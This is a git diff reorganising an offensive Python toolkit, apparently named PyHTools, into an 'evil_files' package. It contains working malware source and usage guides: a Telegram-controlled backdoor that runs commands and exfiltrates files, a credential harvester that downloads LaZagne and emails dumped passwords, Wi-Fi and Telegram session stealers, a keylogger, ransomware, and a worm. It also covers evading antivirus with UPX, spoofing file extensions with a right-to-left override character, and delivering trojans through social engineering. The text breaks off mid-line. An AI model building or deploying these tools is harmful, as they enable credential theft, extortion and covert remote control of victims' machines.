diff --git a/pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md b/HowTo/Malwares/CreateTrojanPackage.md similarity index 59% rename from pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md rename to HowTo/Malwares/CreateTrojanPackage.md index 16033b5..a78b68b 100644 --- a/pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md +++ b/HowTo/Malwares/CreateTrojanPackage.md @@ -1,37 +1,44 @@ -# Packaging Trojans with any file. - - ## Using App Data +# Packaging Trojans with any file + +## Using App Data + +### Steps - ### Steps - Install Pyinstaller - Downloading Icon : - - Download Icon from [IconFinder](https://iconfinder.com/) - - set filters to free and choose high resolution. - - download icon + - Download Icon from [IconFinder](https://iconfinder.com/) + - set filters to free and choose high resolution. + - download icon - Changing downloaded png to ico - - Visit [ICO convert](https://icoconvert.com/) or [OnlineConvert.com](https://image.online-convert.com/convert-to-ico) - - Upload image - - choose desired settings - - convert and download ico file + - Visit [ICO convert](https://icoconvert.com/) or [OnlineConvert.com](https://image.online-convert.com/convert-to-ico) + - Upload image + - choose desired settings + - convert and download ico file - If using requests use 2.5.1 - ``` - $ pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py" + + ```bash + pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py" ``` ### Bypassing AV using UPX + - Download [UPX](https://github.com/upx/upx/releases/tag/v3.96) -- Extract files +- Extract files - Use UPX to compress pyinstaller generated executable - Syntax: - ``` - $ ./upx "full_path_of_executable" -o "full_path_of_compressed_executable" + + ```bash + ./upx "full_path_of_executable" -o "full_path_of_compressed_executable" ``` ### Spoofing File Type + - Copy Right to left override character (U+202E). copy from below or from [unicode-explorer website](https://unicode-explorer.com/c/202E) -``` -‮ -``` + + ```string + ‮ + ``` + - file_name-`(type_everything_in_reverse_order)` and paste copied character after `-`. - eg : sample_pdf-`fdp.exe` @@ -46,5 +53,6 @@ - spoofed file_name : spoofed_al`exe.pdf` - actual file_name : spoofed_al`fdp.exe` -### Send File to victim -- Send file to victim through using attacks or social engineering. \ No newline at end of file +### Send File to victim + +- Send file to victim through using attacks or social engineering. diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md b/HowTo/Malwares/ReverseBackdoor-HTTP.md similarity index 97% rename from pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md rename to HowTo/Malwares/ReverseBackdoor-HTTP.md index e886bcf..dd61f9e 100644 --- a/pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md +++ b/HowTo/Malwares/ReverseBackdoor-HTTP.md @@ -5,14 +5,18 @@ ## Usage ### Attack over LAN + - Start listener + ```bash python3 listener.py ``` + > Default port = 8080 > Change port in `listerner.py` on line 33 if another service is using 8080 port - Edit `IP` and `PORT` values in `backdoor.py` on line 48 + ```python IP = 'attacker_local_ip' PORT = attacker_port # 8080 @@ -21,35 +25,41 @@ ### Attack over the internet - Start a ssh tunnel on attacker's device. + ```bash ssh -R 80:localhost: ``` - > Note : Replace with port on which local server is running + > Note : Replace with port on which local server is running - Copy link that will be available after successfully tunelling between attacker's machine and localhost.run server. + ``` example : .localhost.run ``` - Start Listener on your localhost using + ```bash python3 listener.py ``` - Replace copied link in `backdoor.py` on line 48. + ```python IP = '.localhost.run' ``` - Use social engineering to make user to execute the python file or created standalone executable/trojan. Use python to run backdoor.py script. + ``` python3 backdoor.py ``` - Now use post exploitation tools to gain admin priviliges -# Tested on +# Tested on + - Windows 10 - Debian based OSes -- Android Termux \ No newline at end of file +- Android Termux diff --git a/pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md b/HowTo/Malwares/ReverseBackdoor-TCP.md similarity index 71% rename from pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md rename to HowTo/Malwares/ReverseBackdoor-TCP.md index 1b12f3a..b3aa391 100644 --- a/pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md +++ b/HowTo/Malwares/ReverseBackdoor-TCP.md @@ -1,5 +1,8 @@ +# TCP backdoor + ## Change Values according to need + - change ip and port to your desired values in listener.py and reverse_backdoor.py - run listener.py on attackers machine. @@ -7,26 +10,29 @@ - run backdoor.py on victims machine. ## Create a executable\standalone + - pip3 install pyinstaller -- Creating executable with console: +- Creating executable with console: + ```bash - $ pyinstaller python_file.py --onefile + pyinstaller python_file.py --onefile ``` -- Creating executable without console: +- Creating executable without console: + ```bash - $ pyinstaller python_file.py --onefile --noconsole + pyinstaller python_file.py --onefile --noconsole ``` - -> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc. +> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc. > If we're using STDI/O streams then we have to set then to DEVNULL = open(os.devnull, 'wb') then set IOstreams to DEVNULL > if using subprocess.check_output then use subprocess.check_output(command, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL). > here stdio is being handled by check_output. so no need to handle stdio. ## Create windows executable on linux -- Install Wine -- Download Python for windows -- Install Downloaded python for windows using wine on linux + +- Install Wine +- Download Python for windows +- Install Downloaded python for windows using wine on linux - the other commands remain the same to create executable. diff --git a/HowTo/Malwares/SendEmail.md b/HowTo/Malwares/SendEmail.md new file mode 100644 index 0000000..93c0ccc --- /dev/null +++ b/HowTo/Malwares/SendEmail.md @@ -0,0 +1,22 @@ +# Send Email Requirements + +## Steps + +- Turn on 2FA +- Go to GoogleAcc->Security->AppPassword->Custom +- Copy generated key and use that as password + +## Use malwares.utils module + +```python +from pyhtools.malwares.utils import send_mail + +send_mail( + email = 'email.id@domain.com', + password = 'your', + receiver_mail = 'emails_separated_by_comma', + message = 'your message', + smtp_server = 'smtp.gmail.com', + smtp_port= 587 +) +``` diff --git a/pyhtools/malwares/telegram_data_harvester/HowToUse.md b/HowTo/Malwares/TelegramDataHarvester.md similarity index 99% rename from pyhtools/malwares/telegram_data_harvester/HowToUse.md rename to HowTo/Malwares/TelegramDataHarvester.md index 8a3cc23..f049454 100644 --- a/pyhtools/malwares/telegram_data_harvester/HowToUse.md +++ b/HowTo/Malwares/TelegramDataHarvester.md @@ -1,6 +1,7 @@ # How to use Telegram Data Harvester ## Steps + - Create a Gmail App Password - update telegram_data_harvester.py lines 64 and 65 with your gmail and App Password - Create a executable file or trojan @@ -8,6 +9,7 @@ - You will receive an email with telegram data as a zip when target executes the program/trojan. ## How to use their account + - Extract tdata folder from the zip file - go to your installed telegram desktop location - replace your tdata file with the zip tdata folder diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md b/HowTo/Malwares/TelegramRemoteCodeExecutor.md similarity index 96% rename from pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md rename to HowTo/Malwares/TelegramRemoteCodeExecutor.md index 87c330c..795bf74 100644 --- a/pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md +++ b/HowTo/Malwares/TelegramRemoteCodeExecutor.md @@ -1,12 +1,11 @@ # How to use Telegram Remote Code Executor -- Get Token for bot from [Telegram BotFather](https://t.me/botfather) and update `API_KEY` on line 7 of `TelegramRemoteCodeExecutor.py` -- Get Attacker's User ID from [UserInfoBot](https://t.me/userinfobot) or run TelegramRemoteCodeExecutor.py and use `/start` command to get user id and then update `CHAT_ID` on line 8 of `TelegramRemoteCodeExecutor.py` +- Get Token for bot from [Telegram BotFather](https://t.me/botfather) and update `API_KEY` on line 7 of `TelegramRemoteCodeExecutor.py` +- Get Attacker's User ID from [UserInfoBot](https://t.me/userinfobot) or run TelegramRemoteCodeExecutor.py and use `/start` command to get user id and then update `CHAT_ID` on line 8 of `TelegramRemoteCodeExecutor.py` - Create trojan/malware using `pyinstaller` and send it to victim - When victims runs malware program, attacker will be notified through the bot on telegram - Attacker can use commands to exploit the machine remotely through Telegram over the internet - | Command | Description | Params | |:-----:|:--------:|:-------: | | /start | starts interaction with the bot and returns command issuer details | None | diff --git a/HowTo/Malwares/WirelessProfileHarvester.md b/HowTo/Malwares/WirelessProfileHarvester.md new file mode 100644 index 0000000..25a549b --- /dev/null +++ b/HowTo/Malwares/WirelessProfileHarvester.md @@ -0,0 +1,7 @@ +# Wireless Profile Harvester + +## HOW to use + +- Read [HowTo/Malwares/SendEmail.md](./SendEmail.md) to and use app password +- Update email id and password (app password) +- Create exe: pyinstaller.exe --onefile --icon='icon_path' -n 'name_of_file' .\wireless_profile_harvestor.py diff --git a/examples/Malwares/TelegramBackdoor.py b/examples/Malwares/TelegramBackdoor.py new file mode 100644 index 0000000..d9d83fe --- /dev/null +++ b/examples/Malwares/TelegramBackdoor.py @@ -0,0 +1,14 @@ +from curses import start_color +''' +Controls the compromised machine using telegram +''' +import pyhtools.evil_files.malwares.telegram_remote_code_executor.TelegramRemoteCodeExecutor as evil_bot + +# set API_KEY and CHAT_ID before starting bot +# Note: to find user id, start the bot, and message this bot with /start +evil_bot.API_KEY = 'your_bot_key/token' +evil_bot.CHAT_ID = 0 # int - attacker's user id + +# start bot +# Note: for windows create malware with runtime broker +evil_bot.start_bot() \ No newline at end of file diff --git a/examples/Malwares/TelegramDataHarvester.py b/examples/Malwares/TelegramDataHarvester.py new file mode 100644 index 0000000..52ffead --- /dev/null +++ b/examples/Malwares/TelegramDataHarvester.py @@ -0,0 +1,12 @@ +from pyhtools.evil_files.malwares.telegram_data_harvester.harvester import TelegramHarvester + + +tdata_harvester = TelegramHarvester( + sender_email='dummy_email', # dummy email to send collected data + sender_passwd='dummy_email_passwd', # dummy email account password for authentication + server='smtp.gmail.com', # smtp email server domain + port=587, # smtp server port + receivers='attacker_email', # email where harvested data will sent +) + +tdata_harvester.start() diff --git a/pyhtools/malwares/keylogger/dlogs.py b/examples/Malwares/key_logger.py similarity index 64% rename from pyhtools/malwares/keylogger/dlogs.py rename to examples/Malwares/key_logger.py index f3ca53e..35b7f54 100644 --- a/pyhtools/malwares/keylogger/dlogs.py +++ b/examples/Malwares/key_logger.py @@ -1,4 +1,4 @@ -from keylogger import KeyLogger +from pyhtools.evil_files.malwares.keylogger import KeyLogger key_logger = KeyLogger(email='yourgmailaccount', password='yourpassword', interval_in_secs=60) key_logger.run() diff --git a/examples/Malwares/wifi-password-harvester.py b/examples/Malwares/wifi-password-harvester.py new file mode 100644 index 0000000..b9b7fbd --- /dev/null +++ b/examples/Malwares/wifi-password-harvester.py @@ -0,0 +1,13 @@ +import imp +from pyhtools.evil_files.malwares.wireless_password_harvester.harvester import WiFiPasswordHarvester + +# create obj +harvester = WiFiPasswordHarvester( + email='your_email', + passwd='email_passwd', + smtp_server='smtp.gmail.com', + smtp_port=587, +) + +# start harvester +harvester.start() diff --git a/examples/Ransomwares/dmsec_decrypter.py b/examples/Ransomwares/dmsec_decrypter.py new file mode 100644 index 0000000..ebb9e1f --- /dev/null +++ b/examples/Ransomwares/dmsec_decrypter.py @@ -0,0 +1,14 @@ +from pyhtools.evil_files.ransomwares.dmsec.decrypter import DMSecDecrypter + +print('[*] Decrypting....') + +# specify paths to be decrypted +PATHS = [r'paths_to_be_decrypted', ] + +KEY = input('[+] Enter KEY : ') + +# don't pass PATHS if all the drives are to be decrypted. +encrypter = DMSecDecrypter(KEY, PATHS) +encrypter.start() + +print('[*] Decrypted...') diff --git a/examples/Ransomwares/dmsec_encrypter.py b/examples/Ransomwares/dmsec_encrypter.py new file mode 100644 index 0000000..3099c53 --- /dev/null +++ b/examples/Ransomwares/dmsec_encrypter.py @@ -0,0 +1,21 @@ +from pyhtools.evil_files.ransomwares.dmsec.encrypter import DMSecEncrypter + +# Print some meaningful text, so that user don't suspect program as ransomeware +print('[*] Loading...') + +# Specify paths to be encrypted +PATHS = [ + r'path_to_be_encrypted', +] + +# don't pass PATHS if all the drives are to be encrypted +encrypter = DMSecEncrypter( + paths=PATHS, + email='yourgmailid', + passwd='yourapppassword' + smtp_server='smtp.gmail.com', + smtp_port=587, +) + +encrypter.start() +print('[*] Completed') diff --git a/examples/Worms/DirClonerWorm.py b/examples/Worms/DirClonerWorm.py new file mode 100644 index 0000000..654230f --- /dev/null +++ b/examples/Worms/DirClonerWorm.py @@ -0,0 +1,20 @@ +from pyhtools.evil_files.worms.dir_cloner import DirCloner + +# create obj and path +dir_worm = DirCloner() +path = dir_worm.get_curr_drive_folder() + +# set cloning directory +dir_clone_set_status = dir_worm.set_clone_path(path) + +# remove print statements while creating evil files +if dir_clone_set_status: + print(f"[*] Clone path : {path}") +else: + print(f"[!] Failed to set new clone path {path}") + +# for specific folder +dir_worm.clone_dir(times=1, start_after=0) + +# for specific folder and its subfolder +dir_worm.clone_all_dirs(times=1, start_after=0, path=path) diff --git a/pyhtools/UI/functions.py b/pyhtools/UI/functions.py index 0c1b4bf..f2b5e38 100644 --- a/pyhtools/UI/functions.py +++ b/pyhtools/UI/functions.py @@ -1,11 +1,11 @@ from pyhtools.UI.colors import * from prettytable import PrettyTable +from pyhtools.evil_files.malwares.utils import send_mail import pyfiglet import os import sys import pyhtools.attackers.attackers as attacker -import pyhtools.malwares.reverse_backdoor.TCP.listener as listener -import pyhtools.malwares.send_mail.send_mail as mail +import pyhtools.evil_files.malwares.reverse_backdoor.TCP.listener as listener def clrscr(): @@ -23,7 +23,7 @@ def banner(): print(BRIGHT_YELLOW + pyfiglet.figlet_format('PyHTools')) print(BRIGHT_YELLOW + '+' + '-'*42 + '+') - print(BRIGHT_WHITE + '| written by Dhrumil Mistry\tpht v1.0 |') + print(BRIGHT_WHITE + '| written by Dhrumil Mistry\tpht v1.0.1 |') print(BRIGHT_YELLOW + '+' + '-'*42 + '+') @@ -72,7 +72,7 @@ def send_mail_to(email, password, receiver, subject, body) -> bool: ''' print(BRIGHT_WHITE + '[*] Sending email...') msg = f'Subject: {subject}\n{body}' - if mail.send_mail_to(email, receiver, password, msg): + if send_mail(email, receiver, password, msg): print(BRIGHT_YELLOW + '[\u2714] Mail Sent') else: print(BRIGHT_RED + '[\u274c] Unable to send mail.') diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/__init__.py b/pyhtools/evil_files/malwares/__init__.py similarity index 100% rename from pyhtools/malwares/TelegramRemoteCodeExecutor/__init__.py rename to pyhtools/evil_files/malwares/__init__.py diff --git a/pyhtools/malwares/Trojans/__init__.py b/pyhtools/evil_files/malwares/credential_harvester/__init__.py similarity index 100% rename from pyhtools/malwares/Trojans/__init__.py rename to pyhtools/evil_files/malwares/credential_harvester/__init__.py diff --git a/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py b/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py new file mode 100644 index 0000000..cfa7c1b --- /dev/null +++ b/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py @@ -0,0 +1,59 @@ +''' +module: credential_harvester.py +description: get user credentials on Windows machine +platform: Windows +''' +import requests +import os +import tempfile +import subprocess +import zipfile +from pyhtools.evil_files.malwares.utils import send_mail, download +from shutil import rmtree + + +class CredentialHarvester: + @staticmethod + def run(email: str, password: str, lazagne_download_link: str = r'https://github.com/AlessandroZ/LaZagne/releases/download/2.3.2/Windows.zip', smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587): + ''' + generates data report and sends email to self + ''' + # change workding directory to tmp directory + tmp_dir = tempfile.gettempdir() + os.chdir(tmp_dir) + + # get file and extracted directory names + file_name = lazagne_download_link.split('/')[-1] # Windows.zip + extract_dir = file_name.split('.')[0] # Windows + + # download and unzip lazagne + download(lazagne_download_link) + with zipfile.ZipFile(file_name, 'r') as zip_file: + zip_file.extractall(tmp_dir) + + # change to extracted directory (Windows) + os.chdir(extract_dir) + + # generate reports + recovered_report = subprocess.call('laZagne_x86.exe all') + report = subprocess.check_output('lazagne.exe all -vv') + msg = f'Subject: Credential Harvester Report.\n\n{"-"*25}\n{report}\n{"-"*25}\n{recovered_report}' + + # mail reports + send_mail( + email=email, + receiver_mail=email, + password=password, + message=msg, + smtp_server=smtp_server, + smtp_port=smtp_port, + ) + + # remove traces + os.chdir('..') + rmtree(extract_dir) + os.remove(file_name) + + +if __name__ == '__main__': + CredentialHarvester.run('your_gmail', 'your_gmail_passwd') diff --git a/pyhtools/malwares/__init__.py b/pyhtools/evil_files/malwares/keylogger/__init__.py similarity index 100% rename from pyhtools/malwares/__init__.py rename to pyhtools/evil_files/malwares/keylogger/__init__.py diff --git a/pyhtools/malwares/keylogger/keylogger.py b/pyhtools/evil_files/malwares/keylogger/keylogger.py similarity index 100% rename from pyhtools/malwares/keylogger/keylogger.py rename to pyhtools/evil_files/malwares/keylogger/keylogger.py diff --git a/pyhtools/malwares/credential_harvester/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/__init__.py similarity index 100% rename from pyhtools/malwares/credential_harvester/__init__.py rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/__init__.py diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/backdoor.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/backdoor.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/HTTP/backdoor.py rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/backdoor.py diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/listener.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/listener.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/HTTP/listener.py rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/listener.py diff --git a/pyhtools/malwares/downloader/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/__init__.py similarity index 100% rename from pyhtools/malwares/downloader/__init__.py rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/__init__.py diff --git a/pyhtools/malwares/reverse_backdoor/TCP/listener.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/listener.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/TCP/listener.py rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/listener.py diff --git a/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/reverse_backdoor.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/reverse_backdoor.py diff --git a/pyhtools/malwares/keylogger/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/__init__.py similarity index 100% rename from pyhtools/malwares/keylogger/__init__.py rename to pyhtools/evil_files/malwares/reverse_backdoor/__init__.py diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/__init__.py b/pyhtools/evil_files/malwares/telegram_data_harvester/__init__.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/HTTP/__init__.py rename to pyhtools/evil_files/malwares/telegram_data_harvester/__init__.py diff --git a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py b/pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py similarity index 92% rename from pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py rename to pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py index 5123331..5c813b2 100644 --- a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py +++ b/pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py @@ -144,12 +144,3 @@ def start(self): for tpath in self.tdata_paths: self.create_archive_and_send_mail( source_path=tpath, dest_path=self.temp_path) - -if __name__ == '__main__': - tdata_harvester = TelegramHarvester( - sender_email='dummy_email', # dummy email to send collected data - sender_passwd='dummy_email_passwd', # dummy email account password for authentication - server='smtp.gmail.com', # smtp email server domain - port=587, # smtp server port - receivers='attacker_email', # email where harvested data will sent - ) \ No newline at end of file diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py b/pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py similarity index 80% rename from pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py rename to pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py index df5c501..188e57e 100644 --- a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py +++ b/pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py @@ -1,11 +1,12 @@ -import telebot, os +import telebot +import os from telebot.types import Message as tele_message from subprocess import check_output # set API_KEY and CHAT_ID before starting bot API_KEY = 'your_bot_key/token' -CHAT_ID = 0 # int - attacker's user id +CHAT_ID = 0 # int - attacker's user id # to find user id, start the bot, and message this bot with /start @@ -26,11 +27,12 @@ /download download file from the victims machine to attacker's via telegram chat ''' +# might raise issue, need to update API value bot = telebot.TeleBot(API_KEY) def get_victim(): - return check_output("whoami",shell=True).decode("utf-8") + return check_output("whoami", shell=True).decode("utf-8") def inform_attacker(): @@ -41,28 +43,29 @@ def inform_attacker(): bot.send_message(CHAT_ID, text=message) -def get_user_details(message:tele_message): +def get_user_details(message: tele_message): ''' returns messenger's details ''' return f'ID : {message.from_user.id}\n Name :{message.from_user.full_name}\n[UserName] {message.from_user.username}\nIS BOT : {message.from_user.is_bot}' -def validate_request(message:tele_message) -> bool: +def validate_request(message: tele_message) -> bool: ''' returns True is if request is from hacker, else False ''' if message.from_user.id != int(CHAT_ID): alert_message = f'[!] Intruder Alert!!\n{get_user_details(message)}\nTried Command : {message.text}\n\nDetailed Information :{message}' bot.send_message(chat_id=CHAT_ID, text=alert_message) - bot.send_message(chat_id=message.from_user.id, text='Not Authorized !!') + bot.send_message(chat_id=message.from_user.id, + text='Not Authorized !!') return False return True @bot.message_handler(commands=['start']) -def start(message:tele_message): +def start(message: tele_message): ''' start conversation ''' @@ -74,12 +77,12 @@ def start(message:tele_message): @bot.message_handler(commands=['exec']) -def execute(message:tele_message): +def execute(message: tele_message): ''' executes and returns result to the attacker ''' if not validate_request(message): - return + return cmd = message.text.split('/exec')[-1].strip() try: @@ -91,7 +94,7 @@ def execute(message:tele_message): @bot.message_handler(commands=['help']) -def help(message:tele_message): +def help(message: tele_message): ''' prints help ''' @@ -100,7 +103,7 @@ def help(message:tele_message): @bot.message_handler(commands=['cd']) -def cd(message:tele_message): +def cd(message: tele_message): ''' change current working directory ''' @@ -114,7 +117,7 @@ def cd(message:tele_message): @bot.message_handler(commands=['ls']) -def ls(message:tele_message): +def ls(message: tele_message): ''' replies with list of all the folders and files in the dir to the attacker ''' @@ -125,20 +128,22 @@ def ls(message:tele_message): @bot.message_handler(commands=['download']) -def download_file(message:tele_message): +def download_file(message: tele_message): ''' downloads file from victim's machine to attacker's machine ''' if not validate_request(message): return - + file_path = message.text.split('/download')[-1].strip() if os.path.isfile(file_path): with open(file_path, 'rb') as file: file_data = file.read() - bot.send_document(chat_id=CHAT_ID, data=file_data, caption=f'[*] {file_path} downloaded from {get_victim()}') + bot.send_document(chat_id=CHAT_ID, data=file_data, + caption=f'[*] {file_path} downloaded from {get_victim()}') else: - bot.send_message(chat_id=CHAT_ID, text=f'[!] {file_path} does not exists.') + bot.send_message( + chat_id=CHAT_ID, text=f'[!] {file_path} does not exists.') def start_bot(): @@ -147,9 +152,3 @@ def start_bot(): ''' inform_attacker() bot.polling() - - -if __name__ == '__main__': - # for windows create malware with runtime broker - # while packaging remove print statements - start_bot() diff --git a/pyhtools/malwares/reverse_backdoor/TCP/__init__.py b/pyhtools/evil_files/malwares/telegram_remote_code_executor/__init__.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/TCP/__init__.py rename to pyhtools/evil_files/malwares/telegram_remote_code_executor/__init__.py diff --git a/pyhtools/evil_files/malwares/utils.py b/pyhtools/evil_files/malwares/utils.py new file mode 100644 index 0000000..f8056c6 --- /dev/null +++ b/pyhtools/evil_files/malwares/utils.py @@ -0,0 +1,36 @@ +import smtplib +import requests + + +def send_mail(email: str, receiver_mail: list[str], password: str, message: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> bool: + ''' + sends mail to specific address/addresses. + ''' + try: + server = smtplib.SMTP(smtp_server, smtp_port) + server.starttls() + server.login(email, password) + server.sendmail(email, receiver_mail, message) + server.quit() + return True + except smtplib.SMTPException as e: + print('[-] Exception : ', e) + return False + + +def download(url: str) -> bool: + ''' + description: download and save file from the url. + params: url + returns: bool + ''' + try: + response = requests.get(url) + file_name = url.split('/')[-1] + with open(file_name, 'wb') as file: + file.write(response.content) + return True + + except Exception as e: + print('[-] Exception : ', e) + return False diff --git a/pyhtools/malwares/reverse_backdoor/__init__.py b/pyhtools/evil_files/malwares/wireless_password_harvester/__init__.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/__init__.py rename to pyhtools/evil_files/malwares/wireless_password_harvester/__init__.py diff --git a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py similarity index 74% rename from pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py rename to pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py index fa8856c..456bcc9 100644 --- a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py +++ b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py @@ -1,34 +1,18 @@ +from pyhtools.evil_files.malwares.utils import send_mail import subprocess -import smtplib import re class WiFiPasswordHarvester: - def __init__(self, email: str, passwd: str, smtp_server: str = 'smtp.gmail.com', port: int = 587) -> None: + def __init__(self, email: str, passwd: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> None: # smtp conf self.smtp_server = smtp_server - self.smtp_port = port + self.smtp_port = smtp_port # login details self.email = email self.passwd = passwd - def send_mail(self, message: str) -> bool: - ''' - sends email from mail to itself. - params: mail, password, message -> str - retuns bool - ''' - try: - server = smtplib.SMTP(self.smtp_server, self.smtp_port) - server.starttls() - server.login(self.email, self.password) - server.sendmail(self.email, self.email, message) - server.quit() - return True - except smtplib.SMTPException as e: - return False - def get_credentials(self) -> str: ''' returns wifi credentials as str @@ -71,7 +55,7 @@ def get_username(): def start(self): credentials = self.get_credentials() if credentials: - if self.send_mail(message=credentials): + if send_mail(self.email, self.email, self.passwd, credentials, self.smtp_server, self.smtp_port): print('[*] Process Completed Successfully') return True else: diff --git a/pyhtools/malwares/send_mail/__init__.py b/pyhtools/evil_files/ransomwares/__init__.py similarity index 100% rename from pyhtools/malwares/send_mail/__init__.py rename to pyhtools/evil_files/ransomwares/__init__.py diff --git a/pyhtools/ransomwares/dmsec/HowToUse.md b/pyhtools/evil_files/ransomwares/dmsec/HowToUse.md similarity index 100% rename from pyhtools/ransomwares/dmsec/HowToUse.md rename to pyhtools/evil_files/ransomwares/dmsec/HowToUse.md diff --git a/pyhtools/malwares/telegram_data_harvester/__init__.py b/pyhtools/evil_files/ransomwares/dmsec/__init__.py similarity index 100% rename from pyhtools/malwares/telegram_data_harvester/__init__.py rename to pyhtools/evil_files/ransomwares/dmsec/__init__.py diff --git a/pyhtools/ransomwares/dmsec/decrypter.py b/pyhtools/evil_files/ransomwares/dmsec/decrypter.py similarity index 78% rename from pyhtools/ransomwares/dmsec/decrypter.py rename to pyhtools/evil_files/ransomwares/dmsec/decrypter.py index 5a022fb..0dbe19e 100644 --- a/pyhtools/ransomwares/dmsec/decrypter.py +++ b/pyhtools/evil_files/ransomwares/dmsec/decrypter.py @@ -4,15 +4,16 @@ from os.path import join from psutil import disk_partitions -class DMSECDecrypter: - def __init__(self, key:str=None, paths:list=None) -> None: + +class DMSecDecrypter: + def __init__(self, key: str = None, paths: list = None) -> None: # check key if key == None: print('[!] Invalid KEY') exit() # convert key to bytes - if type(key)==str: + if type(key) == str: key = bytes(key, encoding='utf-8') self.KEY = key print('[!] Decrypting data using KEY :', self.KEY) @@ -27,8 +28,6 @@ def __init__(self, key:str=None, paths:list=None) -> None: self.PATHS = paths print('[!] PATHS to be decrypted :\n', self.PATHS) - - def __get_partitions_path(self) -> list: ''' returns all mounted partition's mount points as a list @@ -38,8 +37,7 @@ def __get_partitions_path(self) -> list: mount_points.append(partition.mountpoint) return mount_points - - def decrypt_file(self, file_path:str): + def decrypt_file(self, file_path: str): ''' decrypts single file ''' @@ -61,8 +59,7 @@ def decrypt_file(self, file_path:str): print(f'[!] Failed to decrypt {file_path}') return False - - def decrypt_files(self, path:str): + def decrypt_files(self, path: str): ''' decrypts all the files in the specified path ''' @@ -71,22 +68,6 @@ def decrypt_files(self, path:str): file_path = join(root, file) self.decrypt_file(file_path=file_path) - def start(self): for path in self.PATHS: self.decrypt_files(path) - - -if __name__ == '__main__': - print('[*] Decrypting....') - - # specify paths to be decrypted - PATHS = [r'paths_to_be_decrypted',] - - KEY = input('[+] Enter KEY : ') - - # don't pass PATHS if all the drives are to be decrypted. - encrypter = DMSECDecrypter(KEY, PATHS) - encrypter.start() - - print('[*] Decrypted...') diff --git a/pyhtools/ransomwares/dmsec/dmsec_ransomeware.py b/pyhtools/evil_files/ransomwares/dmsec/encrypter.py similarity index 56% rename from pyhtools/ransomwares/dmsec/dmsec_ransomeware.py rename to pyhtools/evil_files/ransomwares/dmsec/encrypter.py index 66b1723..ced30a1 100644 --- a/pyhtools/ransomwares/dmsec/dmsec_ransomeware.py +++ b/pyhtools/evil_files/ransomwares/dmsec/encrypter.py @@ -1,17 +1,18 @@ -import smtplib from cryptography.fernet import Fernet from os import walk, environ from os.path import join from psutil import disk_partitions +from pyhtools.evil_files.malwares.utils import send_mail -class DMSECEncrypter: - def __init__(self, paths:list=None, gmail:str=None, passwd:str=None) -> None: +class DMSecEncrypter: + def __init__(self, paths: list = None, email: str = None, passwd: str = None, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> None: # generate new key self.KEY = Fernet.generate_key() + message = f'Subject: RNSMWARE ATTK has been initialized on {environ.get("COMPUTERNAME", 